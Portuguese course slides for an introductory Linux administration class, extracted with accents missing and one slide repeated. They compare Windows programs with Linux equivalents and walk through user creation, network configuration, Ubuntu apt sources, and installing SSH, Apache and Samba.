Comparao dos Programas do Windows x Linux

Windows Linux

Diferenas

Microsoft
Office

Open Office

O Open Office possui todos os recursos do Word, excel e power point


alm de ter a interface grfica igual, menus
e teclas de atalho idnticas ao office, o que facilita a migrao.
Tambm trabalha com arquivos no formato office 97/2000 e no
vulnervel a vrus de macro.

MS Access

MySQL,
PostgreSQL
Oracle

Existem diversas ferramentas de conceito para bancos de dados


corporativos no Linux. Todos produtos compatveis com outras
plataformas.

MS Outlook

Pine, icedove
evolutionmut
t sylpheed,

Centenas de programas de E-Mail tanto em modo texto como em


modo grfico. Instale, avalie e escolha.

MS Internet
Explorer

Firefox,
Opera,
Mozilla, lynx.

Os trs primeiros para modo grfico e o lynx opera em modo texto.

ICQ

LICQ, PIDGIM,
SIM

Muito prtico e fcil de operar. Possibilita a mudana completa da


aparncia do programa atravs de Skins. A organizao dos menus
deste programa outro ponto de destaque.

MSN

AMSN,
PIDGIM

Permite conversar diretamente com usurios do Microsoft MSN.

Photo Shop

The Gimp

Fcil de usar, possui muitos scripts que permitem a criao rpida e


fcil de qualquer tipo de efeito profissional pelo usurio mais leigo.
Acompanha centenas de efeitos especiais e um belo manual em html
com muitas fotos aproximadamente 20MB) que mostra o que
possvel se fazer com ele.
295

Comparao dos Programas do Windows x Linux

Windows Linux

Diferenas

Corel Photo
Paint

GIMP

Programa com funes genricas

Corel Draw

Inkscape,
Sodipodi

Programas equivalentes

Autocad

Qcad

Programa com funes genricas

Visio

dia

Possui funcionalidades identicas e timo conjunto de cones

winamp

xmms

Possui todos os recursos do programa para Windows alm de filtros


que permite acrescentar efeitos digitais da msica (em tempo real),
eco, etc.

media
player

mplayer,
playmidi
xwave,

Programas para execuo de arquivos de msica e videos multimdia.


Existem outras alternativas, a escolha depende de seu gosto e da
sofisticao do programa.

Agente de
Sistema

cron

Pouca diferena. O cron da mais liberdade na programao de tarefas


a serem executadas pelo Linux.

Bate-Papo

talk, ytalk

O talk e o ytalk permite a conversa de dois usurios no s atravs de


uma rede local, mas de qualquer parte do planeta, pois usa o
protocolo tcp/ip para comunicao. Muito til e fcil de usar.

IIS, Pers.

Web Server
Apache

O apache o servidor WEB mais usado no mundo (algo em torno de


75% das empresas), muito rpido e flexvel de se configurar.

Exchange,
NT Mail

Postfix,
Sendmail
Exim, Qmail

72% da base de servidores de emails no mundo atualmente roda em


software livre. Os mais recomendados so o Postfix e o qmail, devido
a segurana, velocidade e integridade de mensagem
296

Comparao dos Programas do Windows x Linux

Windows

Linux

Diferenas

Wingate,
MS Proxy
kerio

Squid, Apache
Ip masquerade, nat,
diald, exim,

,A migrao de um servidor proxy para Linux requer o uso


de
vrios programas separados para que se tenha um resultado
profissional. Isto pode parecer incomodo no comeo, mas
voc logo perceber que a diviso de servios entre
programas mais produtivo. Quando desejar substituir um
deles, o funcionamento dos outros no sero afetados. No
vou entrar em detalhes sobre os programas citados ao lado,
mas o squid um servidor proxy Web (HTTP e HTTPS)
completo e tambm apresenta um excelente servio FTP.
Possui outros mdulos como dns, ping, restries de acesso,
limites de tamanho de arquivos, cache, etc.

MS
Frontpage

Mozilla e muitas
outras ferramentas
para a gerao WEB
(como zope, do site
da distribuio Debian
php3, php4, wdm,
htdig)

Sem comentrios... todas so


ferramentas para de grandes Web Sites. O wdm,
gerao de contedo por exemplo, usado na gerao
(http://www.debian.org) em 30 idiomas diferentes.

MS Winsock

Sem equivalente

O Linux tem suporte nativo a tcp/ip desde o comeo de sua


existncia e no precisa de nenhuma camada de
comunicao entre ele e a Internet. A performance
aproximadamente 10% maior em conexes Internet via faxmodem e outras redes tcp/ip.

AVG,
Viruscan,

AVG, Viruscan,
Clamavis, AVG , F-

Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan


disponibilizam verses para Linux,com o objetivo principal297

Comparao dos Programas do Windows x Linux

Windows

Linux

Diferenas

Wingate,
MS Proxy
kerio

Squid, Apache
Ip masquerade, nat,
diald, exim,

,A migrao de um servidor proxy para Linux requer o uso


de
vrios programas separados para que se tenha um resultado
profissional. Isto pode parecer incomodo no comeo, mas
voc logo perceber que a diviso de servios entre
programas mais produtivo. Quando desejar substituir um
deles, o funcionamento dos outros no sero afetados. No
vou entrar em detalhes sobre os programas citados ao lado,
mas o squid um servidor proxy Web (HTTP e HTTPS)
completo e tambm apresenta um excelente servio FTP.
Possui outros mdulos como dns, ping, restries de acesso,
limites de tamanho de arquivos, cache, etc.

MS
Frontpage

Mozilla e muitas
outras ferramentas
para a gerao WEB
(como zope, do site
da distribuio Debian
php3, php4, wdm,
htdig)

Sem comentrios... todas so


ferramentas para de grandes Web Sites. O wdm,
gerao de contedo por exemplo, usado na gerao
(http://www.debian.org) em 30 idiomas diferentes.

MS Winsock

Sem equivalente

O Linux tem suporte nativo a tcp/ip desde o comeo de sua


existncia e no precisa de nenhuma camada de
comunicao entre ele e a Internet. A performance
aproximadamente 10% maior em conexes Internet via faxmodem e outras redes tcp/ip.

AVG,
Viruscan,

AVG, Viruscan,
Clamavis, AVG , F-

Os maiores fabricantes de anti-virus norton, F-Prot, ViruScan


disponibilizam verses para Linux,com o objetivo principal298

Criao de Usurios

sudo adduser <nome_user>


sudo passwd <nome_user>
cat /etc/passwd
cat /etc/group

Exerccio: Crie um usurio com o seu nome, e


um grupo chamado aula. Associe o usurio
ao grupo aula e depois ao grupo virtual

$sudo adduser <nome>


$sudo addgroup aula
$vi /etc/group
$vi /etc/passwd
299

Configurao de rede

1. Descubra o modelo de sua placa de rede, digite:


# lspci
O resultado de ser algo como:
Ethernet controller: VIA Technologies, Inc. VT6105 [Rhine-III] (rev8b)
2. Agora veja em que eth o seu sistema identificou a placa, se for uma nica placa de rede provavelmente
eth0. Use o comando:
# cat /var/log/messages | egrep "eth"
O resultado dever ser:
Oct 20 11:18:55 fw2 kernel: eth0: VIA VT6105 Rhine-III at 0xec00, 00:xx:xx:xx:xx:xx, IRQ 5.
3. Beleza, sabendo que sua placa uma VIA Rhine, carregue o mdulo referente.
# vi /etc/modules
Coloque o seguinte:
alias eth0 via-rhine.ko

300

Configurao de rede
4. Vamos editar o arquivo que verificado quando o servio de rede iniciado:
# vi /etc/network/interfaces
Coloque a seguinte linha neste arquivo para ip dinmico:
auto eth0
iface eth0 inet dhcp
ou o seguinte linhas para ip fixo:
auto eth0
iface eth0 inet static
address 192.168.0.1
network 192.168.254.254
broadcast 192.168.0.255
gateway 192.168.0.254
5. Para iniciar o servio de rede execute o comando:
# invoke-rc.d network start

301

Configurao de rede

s testar agora:
# ping 192.168.254.35
PING 192.168.254.35 (192.168.254.35) 56(84) bytes of data.
64 bytes from 192.168.254.35: icmp_seq=0 ttl=64 time=0.262 ms
64 bytes from 192.168.254.35: icmp_seq=1 ttl=64 time=0.102 ms
64 bytes from 192.168.254.35: icmp_seq=2 ttl=64 time=0.155 ms
6. Para confirmar se sua interface est ativa digite:
# ifconfig

Se estive ok deve mostrar:


eth0 Encapsulamento do Link: Ethernet Endereo de HW 00:xx:xx:xx:xx:xx
inet end.:
192.168.0.1 Bcast:192.168.0.255 Masc:255.255.255.0
UP BROADCASTRUNNING
MULTICAST MTU:1500 Mtrica:1
pacotes RX:13951137 erros:0 descart.:0 sobrepos.:0
quadro:0
pacotes TX:9849100 erros:0 descart.:0 sobrepos.:0 portadora:0
colises:0
txqueuelen:1000
RX bytes:4069140904 (1.6 Mb) TX bytes:1802073588 (8.5 Mb)
IRQ:10 Endereo de E/S:0xde00 7. No esquea de colocar o servio para ser iniciado toda
vez que ligar a mquina. Use o comando:
# update-rc.d -f network defaults

302

Configurao de servios
Editar o arquivo souce.list
- vi /etc/apt/souce.list
# Ubuntu supported packages
deb http://us.archive.ubuntu.com/ubuntu hardy main restricted
deb-src http://us.archive.ubuntu.com/ubuntu hardy restricted main multiverse universe
deb http://us.archive.ubuntu.com/ubuntu hardy-updates main restricted
deb-src http://us.archive.ubuntu.com/ubuntu hardy-updates restricted main multiverse universe
deb http://security.ubuntu.com/ubuntu hardy-security main restricted
deb-src http://security.ubuntu.com/ubuntu hardy-security restricted main multiverse universe
# Ubuntu community supported packages
deb http://us.archive.ubuntu.com/ubuntu hardy universe multiverse
deb http://us.archive.ubuntu.com/ubuntu hardy-updates universe multiverse
deb http://security.ubuntu.com/ubuntu hardy-security universe multiverse
# Ubuntu backports project
deb http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse
deb-src http://us.archive.ubuntu.com/ubuntu hardy-backports main restricted universe multiverse
deb http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe
deb-src http://us.archive.ubuntu.com/ubuntu hardy-proposed restricted main multiverse universe

303

Sources.list para a famlia Ubuntu Feisty Fawn


# See http://help.ubuntu.com/community/UpgradeNotes for how to upgrade to
# newer versions of the distribution.
deb http://br.archive.ubuntu.com/ubuntu/ feisty main restricted
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty main restricted
## Major bug fix updates produced after the final release of the
## distribution.
deb http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-updates main restricted
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## universe WILL NOT receive any review or updates from the Ubuntu security
## team.
deb http://br.archive.ubuntu.com/ubuntu/ feisty universe
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty universe
## N.B. software from this repository is ENTIRELY UNSUPPORTED by the Ubuntu
## team, and may not be under a free licence. Please satisfy yourself as to
## your rights to use the software. Also, please note that software in
## multiverse WILL NOT receive any review or updates from the Ubuntu
## security team.
deb http://br.archive.ubuntu.com/ubuntu/ feisty multiverse
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty multiverse
## Uncomment the following two lines to add software from the 'backports'
## repository.
## N.B. software from this repository may not have been tested as
## extensively as that contained in the main release, although it includes
## newer versions of some applications which may provide useful features.
## Also, please note that software in backports WILL NOT receive any review
## or updates from the Ubuntu security team.
deb http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb-src http://br.archive.ubuntu.com/ubuntu/ feisty-backports main restricted universe multiverse
deb http://security.ubuntu.com/ubuntu feisty-security main restricted
deb-src http://security.ubuntu.com/ubuntu feisty-security main restricted
deb http://security.ubuntu.com/ubuntu feisty-security universe
deb-src http://security.ubuntu.com/ubuntu feisty-security universe
deb http://security.ubuntu.com/ubuntu feisty-security multiverse
deb-src http://security.ubuntu.com/ubuntu feisty-security multiverse

304

Configurao de servios
Apt-get update
Apt-get upgrade
Apt-get install <pacote ou

servio>

305

Instalao do SSH
sudo apt-apt get update
sudo apt-get install openssh-server
vi /etc/ssh/sshd_config
sudo /etc/init.d/ssh restart
Putty free e winscp

306

Instalao do Apache
sudo apt-get install apache2
Verificar o Local da pasta Base:

sudo vi /etc/apache2/sites-available/default
- Alterar o DocumentRoot de /var/www/ para
/var/www/site2/
Copiar o site do seu micro para a /var/www/

(colocar primeiro na sua pasta home e depois


usar o comando
sudo cp R /home/virtual/site2 /var/www/

307

Instalao do Apache
Alterar o arquivo de procurar do nome

inicial, no nosso caso ser acrescentar o


index.htm, isto dentro do diretrio
/etc/apache2/httpd.conf
sudo i /etc/apache2/httpd.conf
<IfModule dir_module>
DirectoryIndex index2.htm index.html
index.htm index.shtml index.php index.php5
index.php4 index.php3 index.phtml index.cgi
</IfModule>

308

Instalao do samba
apt-get install samba
Editar o arquivo

/etc/samba/smb.conf
vi /etc/samba/smb.conf
Reinicializar o servio

sudo /ets/init.d/samba restart


309

[global]
workgroup = AULA
netbios name = SRV-AULA
# server string = %h server (Samba, Ubuntu)
server string =
#---------------------------------------------#
kernel oplocks = no
socket options = TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=8192
SO_SNDB$
#-----------------------------------------------passdb backend = tdbsam
security = user
username map = /etc/samba/smbusers
name resolve order = wins bcast hosts
domain logons = yes
preferred master = yes
wins support = yes

310

#============== Share Definitions ==================


[printers]
comment = All Printers
browseable = no
path = /var/spool/samba
printable = yes
guest ok = no
read only = yes
create mask = 0700
#nome do compartilhamento
[arquivos]
comment = Pasta Publica
path = /arquivos
valid users = teste
#force group = users
create mask = 0660
directory mask = 0771
writable = yes

311

Configurao de Servio
(Grfico)

312

Configurao de Servio
(Grfico)

313

Se voc no pode proteger o que tem, voc


no tem nada.

Fim do Curso.
Dvidas

Reflexo:
Os computadores so incrivelmente rpidos, precisos e burros; os
homens so incrivelmente lentos, imprecisos e brilhantes; juntos, seu
poder ultrapassa os limites da Imaginao Albert Einstein
315

Você também pode gostar